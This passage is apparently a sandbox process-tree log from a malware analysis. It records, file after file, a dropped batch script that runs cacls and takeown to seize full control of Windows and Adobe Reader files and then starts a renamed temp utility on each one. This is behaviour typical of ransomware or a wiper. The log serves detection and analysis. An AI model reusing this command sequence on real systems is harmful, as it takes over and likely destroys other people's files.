    C:\Windows\system32\cmd.exe /c mVSen3Ss.exe -accepteula "classes.jsa" -nobanner
    3⤵
    PID:2872
  - - C:\Users\Admin\AppData\Local\Temp\mVSen3Ss.exe
      mVSen3Ss.exe -accepteula "classes.jsa" -nobanner
      4⤵
      PID:1928
- - C:\Users\Admin\AppData\Local\Temp\mVSen3Ss.exe
    mVSen3Ss.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:3996
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\YbhBhE16.bat" "C:\Program Files\Windows Journal\de-DE\MSPVWCTL.DLL.mui""
  2⤵
  PID:4040
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Windows Journal\de-DE\MSPVWCTL.DLL.mui" /E /G Admin:F /C
    3⤵
    PID:1792
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Windows Journal\de-DE\MSPVWCTL.DLL.mui"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:4048
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c mVSen3Ss.exe -accepteula "MSPVWCTL.DLL.mui" -nobanner
    3⤵
    PID:4076
  - - C:\Users\Admin\AppData\Local\Temp\mVSen3Ss.exe
      mVSen3Ss.exe -accepteula "MSPVWCTL.DLL.mui" -nobanner
      4⤵
      PID:4072
- - C:\Users\Admin\AppData\Local\Temp\mVSen3Ss.exe
    mVSen3Ss.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:2256
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\YbhBhE16.bat" "C:\Program Files\Windows Journal\es-ES\JNTFiltr.dll.mui""
  2⤵
  PID:2800
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Windows Journal\es-ES\JNTFiltr.dll.mui" /E /G Admin:F /C
    3⤵
    PID:1452
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Windows Journal\es-ES\JNTFiltr.dll.mui"
    3⤵
    - Modifies file permissions
    - Suspicious use of AdjustPrivilegeToken
    PID:1976
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c mVSen3Ss.exe -accepteula "JNTFiltr.dll.mui" -nobanner
    3⤵
    PID:2924
  - - C:\Users\Admin\AppData\Local\Temp\mVSen3Ss.exe
      mVSen3Ss.exe -accepteula "JNTFiltr.dll.mui" -nobanner
      4⤵
      PID:3756
- - C:\Users\Admin\AppData\Local\Temp\mVSen3Ss.exe
    mVSen3Ss.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:2420
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\YbhBhE16.bat" "C:\Program Files\Windows Journal\fr-FR\Journal.exe.mui""
  2⤵
  PID:2268
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Windows Journal\fr-FR\Journal.exe.mui" /E /G Admin:F /C
    3⤵
    PID:3124
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Windows Journal\fr-FR\Journal.exe.mui"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:3952
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c mVSen3Ss.exe -accepteula "Journal.exe.mui" -nobanner
    3⤵
    PID:1952
  - - C:\Users\Admin\AppData\Local\Temp\mVSen3Ss.exe
      mVSen3Ss.exe -accepteula "Journal.exe.mui" -nobanner
      4⤵
      PID:3572
- - C:\Users\Admin\AppData\Local\Temp\mVSen3Ss.exe
    mVSen3Ss.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:3280
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\YbhBhE16.bat" "C:\Program Files\Windows Journal\it-IT\PDIALOG.exe.mui""
  2⤵
  PID:3108
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Windows Journal\it-IT\PDIALOG.exe.mui" /E /G Admin:F /C
    3⤵
    PID:3188
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Windows Journal\it-IT\PDIALOG.exe.mui"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:1900
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c mVSen3Ss.exe -accepteula "PDIALOG.exe.mui" -nobanner
    3⤵
    PID:1500
  - - C:\Users\Admin\AppData\Local\Temp\mVSen3Ss.exe
      mVSen3Ss.exe -accepteula "PDIALOG.exe.mui" -nobanner
      4⤵
      PID:1044
- - C:\Users\Admin\AppData\Local\Temp\mVSen3Ss.exe
    mVSen3Ss.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:1892
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\YbhBhE16.bat" "C:\Program Files\Windows Journal\Templates\blank.jtp""
  2⤵
  PID:3184
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Windows Journal\Templates\blank.jtp" /E /G Admin:F /C
    3⤵
    PID:1020
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Windows Journal\Templates\blank.jtp"
    3⤵
    PID:3292
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c mVSen3Ss.exe -accepteula "blank.jtp" -nobanner
    3⤵
    PID:1544
  - - C:\Users\Admin\AppData\Local\Temp\mVSen3Ss.exe
      mVSen3Ss.exe -accepteula "blank.jtp" -nobanner
      4⤵
      PID:3348
- - C:\Users\Admin\AppData\Local\Temp\mVSen3Ss.exe
    mVSen3Ss.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:2128
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\YbhBhE16.bat" "C:\Program Files\Windows Journal\Templates\To_Do_List.jtp""
  2⤵
  PID:2388
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Windows Journal\Templates\To_Do_List.jtp" /E /G Admin:F /C
    3⤵
    PID:1184
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Windows Journal\Templates\To_Do_List.jtp"
    3⤵
    PID:2912
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c mVSen3Ss.exe -accepteula "To_Do_List.jtp" -nobanner
    3⤵
    PID:3288
  - - C:\Users\Admin\AppData\Local\Temp\mVSen3Ss.exe
      mVSen3Ss.exe -accepteula "To_Do_List.jtp" -nobanner
      4⤵
      PID:3284
- - C:\Users\Admin\AppData\Local\Temp\mVSen3Ss.exe
    mVSen3Ss.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:3064
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\YbhBhE16.bat" "C:\Program Files\Windows Mail\it-IT\WinMail.exe.mui""
  2⤵
  PID:1332
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Windows Mail\it-IT\WinMail.exe.mui" /E /G Admin:F /C
    3⤵
    PID:3324
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Windows Mail\it-IT\WinMail.exe.mui"
    3⤵
    PID:900
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c mVSen3Ss.exe -accepteula "WinMail.exe.mui" -nobanner
    3⤵
    PID:3332
  - - C:\Users\Admin\AppData\Local\Temp\mVSen3Ss.exe
      mVSen3Ss.exe -accepteula "WinMail.exe.mui" -nobanner
      4⤵
      PID:3336
- - C:\Users\Admin\AppData\Local\Temp\mVSen3Ss.exe
    mVSen3Ss.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:3384
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\YbhBhE16.bat" "C:\Program Files\Windows Photo Viewer\en-US\PhotoAcq.dll.mui""
  2⤵
  PID:3380
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Windows Photo Viewer\en-US\PhotoAcq.dll.mui" /E /G Admin:F /C
    3⤵
    PID:3448
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Windows Photo Viewer\en-US\PhotoAcq.dll.mui"
    3⤵
    - Modifies file permissions
    PID:3436
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c mVSen3Ss.exe -accepteula "PhotoAcq.dll.mui" -nobanner
    3⤵
    PID:3412
  - - C:\Users\Admin\AppData\Local\Temp\mVSen3Ss.exe
      mVSen3Ss.exe -accepteula "PhotoAcq.dll.mui" -nobanner
      4⤵
      PID:1592
- - C:\Users\Admin\AppData\Local\Temp\mVSen3Ss.exe
    mVSen3Ss.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:3500
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\YbhBhE16.bat" "C:\Program Files\Windows Photo Viewer\it-IT\PhotoAcq.dll.mui""
  2⤵
  PID:3540
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Windows Photo Viewer\it-IT\PhotoAcq.dll.mui" /E /G Admin:F /C
    3⤵
    PID:3388
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Windows Photo Viewer\it-IT\PhotoAcq.dll.mui"
    3⤵
    PID:3568
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c mVSen3Ss.exe -accepteula "PhotoAcq.dll.mui" -nobanner
    3⤵
    PID:3424
  - - C:\Users\Admin\AppData\Local\Temp\mVSen3Ss.exe
      mVSen3Ss.exe -accepteula "PhotoAcq.dll.mui" -nobanner
      4⤵
      PID:2864
- - C:\Users\Admin\AppData\Local\Temp\mVSen3Ss.exe
    mVSen3Ss.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:1988
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\YbhBhE16.bat" "C:\Users\All Users\Adobe\Acrobat\9.0\Replicate\Security\directories.acrodata""
  2⤵
  PID:2612
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\All Users\Adobe\Acrobat\9.0\Replicate\Security\directories.acrodata" /E /G Admin:F /C
    3⤵
    PID:2792
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\All Users\Adobe\Acrobat\9.0\Replicate\Security\directories.acrodata"
    3⤵
    PID:1904
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c mVSen3Ss.exe -accepteula "directories.acrodata" -nobanner
    3⤵
    PID:2432
  - - C:\Users\Admin\AppData\Local\Temp\mVSen3Ss.exe
      mVSen3Ss.exe -accepteula "directories.acrodata" -nobanner
      4⤵
      PID:3564
- - C:\Users\Admin\AppData\Local\Temp\mVSen3Ss.exe
    mVSen3Ss.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:988
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\YbhBhE16.bat" "C:\Users\All Users\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\superbar.png""
  2⤵
  PID:1496
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\All Users\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\superbar.png" /E /G Admin:F /C
    3⤵
    PID:1660
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\All Users\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\superbar.png"
    3⤵
    - Modifies file permissions
    PID:2660
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c mVSen3Ss.exe -accepteula "superbar.png" -nobanner
    3⤵
    PID:1964
  - - C:\Users\Admin\AppData\Local\Temp\mVSen3Ss.exe
      mVSen3Ss.exe -accepteula "superbar.png" -nobanner
      4⤵
      PID:1084
- - C:\Users\Admin\AppData\Local\Temp\mVSen3Ss.exe
    mVSen3Ss.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:2200
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\YbhBhE16.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\br.gif""
  2⤵
  PID:1920
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\br.gif" /E /G Admin:F /C
    3⤵
    PID:1536
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\br.gif"
    3⤵
    PID:720
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c mVSen3Ss.exe -accepteula "br.gif" -nobanner
    3⤵
    PID:1324
  - - C:\Users\Admin\AppData\Local\Temp\mVSen3Ss.exe
      mVSen3Ss.exe -accepteula "br.gif" -nobanner
      4⤵
      PID:2416
- - C:\Users\Admin\AppData\Local\Temp\mVSen3Ss.exe
    mVSen3Ss.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:2956
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\YbhBhE16.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\form_responses.gif""
  2⤵
  PID:2456
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\form_responses.gif" /E /G Admin:F /C
    3⤵
    PID:1984
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\form_responses.gif"
    3⤵
    PID:2972
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c mVSen3Ss.exe -accepteula "form_responses.gif" -nobanner
    3⤵
    PID:2096
  - - C:\Users\Admin\AppData\Local\Temp\mVSen3Ss.exe
      mVSen3Ss.exe -accepteula "form_responses.gif" -nobanner
      4⤵
      PID:2756
- - C:\Users\Admin\AppData\Local\Temp\mVSen3Ss.exe
    mVSen3Ss.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:1340
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\YbhBhE16.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\review_email.gif""
  2⤵
  PID:2484
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\review_email.gif" /E /G Admin:F /C
    3⤵
    PID:884
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\review_email.gif"
    3⤵
    PID:2448
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c mVSen3Ss.exe -accepteula "review_email.gif" -nobanner
    3⤵
    PID:2276
  - - C:\Users\Admin\AppData\Local\Temp\mVSen3Ss.exe
      mVSen3Ss.exe -accepteula "review_email.gif" -nobanner
      4⤵
      PID:2556
- - C:\Users\Admin\AppData\Local\Temp\mVSen3Ss.exe
    mVSen3Ss.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:1240
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\YbhBhE16.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\tr.gif""
  2⤵
  PID:2156
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\tr.gif" /E /G Admin:F /C
    3⤵
    PID:748
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\tr.gif"
    3⤵
    PID:2876
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c mVSen3Ss.exe -accepteula "tr.gif" -nobanner
    3⤵
    PID:208
  - - C:\Users\Admin\AppData\Local\Temp\mVSen3Ss.exe
      mVSen3Ss.exe -accepteula "tr.gif" -nobanner
      4⤵
      PID:216
- - C:\Users\Admin\AppData\Local\Temp\mVSen3Ss.exe
    mVSen3Ss.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:232
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\YbhBhE16.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\AdobePiStd.otf""
  2⤵
  PID:860
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\AdobePiStd.otf" /E /G Admin:F /C
    3⤵
    PID:1772
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\AdobePiStd.otf"
    3⤵
    PID:3604
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c mVSen3Ss.exe -accepteula "AdobePiStd.otf" -nobanner
    3⤵
    PID:3592
  - - C:\Users\Admin\AppData\Local\Temp\mVSen3Ss.exe
      mVSen3Ss.exe -accepteula "AdobePiStd.otf" -nobanner
      4⤵
      PID:3652
- - C:\Users\Admin\AppData\Local\Temp\mVSen3Ss.exe
    mVSen3Ss.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:1584
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\YbhBhE16.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\MyriadPro-BoldIt.otf""
  2⤵
  PID:3600
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\MyriadPro-BoldIt.otf" /E /G Admin:F /C
    3⤵
    PID:984
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\MyriadPro-BoldIt.otf"
    3⤵
    - Modifies file permissions
    PID:3740
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c mVSen3Ss.exe -accepteula "MyriadPro-BoldIt.otf" -nobanner
    3⤵
    PID:3760
  - - C:\Users\Admin\AppData\Local\Temp\mVSen3Ss.exe
      mVSen3Ss.exe -accepteula "MyriadPro-BoldIt.otf" -nobanner
      4⤵
      PID:3748
- - C:\Users\Admin\AppData\Local\Temp\mVSen3Ss.exe
    mVSen3Ss.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:3776
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\YbhBhE16.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\LanguageNames2\DisplayLanguageNames.en_CA.txt""
  2⤵
  PID:3676
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\LanguageNames2\DisplayLanguageNames.en_CA.txt" /E /G Admin:F /C
    3⤵
    PID:3648
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\LanguageNames2\DisplayLanguageNames.en_CA.txt"
    3⤵
    - Modifies file permissions
    PID:3848
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c mVSen3Ss.exe -accepteula "DisplayLanguageNames.en_CA.txt" -nobanner
    3⤵
    PID:3856
  - - C:\Users\Admin\AppData\Local\Temp\mVSen3Ss.exe
      mVSen3Ss.exe -accepteula "DisplayLanguageNames.en_CA.txt" -nobanner
      4⤵
      PID:3896
- - C:\Users\Admin\AppData\Local\Temp\mVSen3Ss.exe
    mVSen3Ss.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:3828
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\YbhBhE16.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\can.fca""
  2⤵
  PID:3804
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\can.fca" /E /G Admin:F /C
    3⤵
    PID:3876
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\can.fca"
    3⤵
    PID:3784
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c mVSen3Ss.exe -accepteula "can.fca" -nobanner
    3⤵
    PID:3724
  - - C:\Users\Admin\AppData\Local\Temp\mVSen3Ss.exe
      mVSen3Ss.exe -accepteula "can.fca" -nobanner
      4⤵
      PID:1188
- - C:\Users\Admin\AppData\Local\Temp\mVSen3Ss.exe
    mVSen3Ss.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:2568
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\YbhBhE16.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\usa03.ths""
  2⤵
  PID:3920
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\usa03.ths" /E /G Admin:F /C
    3⤵
    PID:1152
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\usa03.ths"
    3⤵
    PID:2788
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c mVSen3Ss.exe -accepteula "usa03.ths" -nobanner
    3⤵
    PID:2816
  - - C:\Users\Admin\AppData\Local\Temp\mVSen3Ss.exe
      mVSen3Ss.exe -accepteula "usa03.ths" -nobanner
      4⤵
      PID:1864
- - C:\Users\Admin\AppData\Local\Temp\mVSen3Ss.exe
    mVSen3Ss.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:3912
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\YbhBhE16.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\GREEK.TXT""
  2⤵
  PID:1572
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\GREEK.TXT" /E /G Admin:F /C
    3⤵
    PID:1676
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\GREEK.TXT"
    3⤵
    PID:1700
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c mVSen3Ss.exe -accepteula "GREEK.TXT" -nobanner
    3⤵
    PID:1628
  - - C:\Users\Admin\AppData\Local\Temp\mVSen3Ss.exe
      mVSen3Ss.exe -accepteula "GREEK.TXT" -nobanner
      4⤵
      PID:2736
- - C:\Users\Admin\AppData\Local\Temp\mVSen3Ss.exe
    mVSen3Ss.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:2396
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\YbhBhE16.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\win\CP1253.TXT""
  2⤵
  PID:2712
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\win\CP1253.TXT" /E /G Admin:F /C
    3⤵
    PID:2468
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\win\CP1253.TXT"
    3⤵
    PID:1640
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c mVSen3Ss.exe -accepteula "CP1253.TXT" -nobanner
    3⤵
    PID:2452
  - - C:\Users\Admin\AppData\Local\Temp\mVSen3Ss.exe
      mVSen3Ss.exe -accepteula "CP1253.TXT" -nobanner
      4⤵
      PID:2804
- - C:\Users\Admin\AppData\Local\Temp\mVSen3Ss.exe
    mVSen3Ss.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:1528
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\YbhBhE16.bat" "C:\Program Files (x86)\Windows Mail\de-DE\msoeres.dll.mui""
  2⤵
  PID:3136
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Windows Mail\de-DE\msoeres.dll.mui" /E /G Admin:F /C
    3⤵
    PID:1668
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Windows Mail\de-DE\msoeres.dll.mui"
    3⤵
    PID:1932
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c mVSen3Ss.exe -accepteula "msoeres.dll.mui" -nobanner
    3⤵
    PID:3112
  - - C:\Users\Admin\AppData\Local\Temp\mVSen3Ss.exe
      mVSen3Ss.exe -accepteula "msoeres.dll.mui" -nobanner
      4⤵
      PID:2196
- - C:\Users\Admin\AppData\Local\Temp\mVSen3Ss.exe
    mVSen3Ss.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:3220
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\YbhBhE16.bat" "C:\Program Files (x86)\Windows Mail\ja-JP\msoeres.dll.mui""
  2⤵
  PID:2572
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Windows Mail\ja-JP\msoeres.dll.mui" /E /G Admin:F /C
    3⤵
    PID:4004
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Windows Mail\ja-JP\msoeres.dll.mui"
    3⤵
    PID:4024
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c mVSen3Ss.exe -accepteula "msoeres.dll.mui" -nobanner
    3⤵
    PID:4000
  - - C:\Users\Admin\AppData\Local\Temp\mVSen3Ss.exe
      mVSen3Ss.exe -accepteula "msoeres.dll.mui" -nobanner
      4⤵
      PID:2344
- - C:\Users\Admin\AppData\Local\Temp\mVSen3Ss.exe
    mVSen3Ss.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:3992
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\YbhBhE16.bat" "C:\Program Files (x86)\Windows Photo Viewer\en-US\PhotoViewer.dll.mui""
  2⤵
  PID:2036
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Windows Photo Viewer\en-US\PhotoViewer.dll.mui" /E /G Admin:F /C
    3⤵
    PID:4068
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Windows Photo Viewer\en-US\PhotoViewer.dll.mui"
    3⤵
    PID:4084
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c mVSen3Ss.exe -accepteula "PhotoViewer.dll.mui" -nobanner
    3⤵
    PID:3176
  - - C:\Users\Admin\AppData\Local\Temp\mVSen3Ss.exe
      mVSen3Ss.exe -accepteula "PhotoViewer.dll.mui" -nobanner
      4⤵
      PID:2412
- - C:\Users\Admin\AppData\Local\Temp\mVSen3Ss.exe
    mVSen3Ss.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:1452
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\YbhBhE16.bat" "C:\Program Files (x86)\Windows Photo Viewer\it-IT\PhotoViewer.dll.mui""
  2⤵
  PID:3556
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Windows Photo Viewer\it-IT\PhotoViewer.dll.mui" /E /G Admin:F /C
    3⤵
    PID:2924
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Windows Photo Viewer\it-IT\PhotoViewer.dll.mui"
    3⤵
    PID:2420
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c mVSen3Ss.exe -accepteula "PhotoViewer.dll.mui" -nobanner
    3⤵
    PID:2708
  - - C:\Users\Admin\AppData\Local\Temp\mVSen3Ss.exe
      mVSen3Ss.exe -accepteula "PhotoViewer.dll.mui" -nobanner
      4⤵
      PID:1684
- - C:\Users\Admin\AppData\Local\Temp\mVSen3Ss.exe
    mVSen3Ss.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:3164
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\YbhBhE16.bat" "C:\Program Files\Microsoft Games\Mahjong\MahjongMCE.png""
  2⤵
  PID:664
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Microsoft Games\Mahjong\MahjongMCE.png" /E /G Admin:F /C
    3⤵
    PID:2728
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Microsoft Games\Mahjong\MahjongMCE.png"
    3⤵
    PID:2528
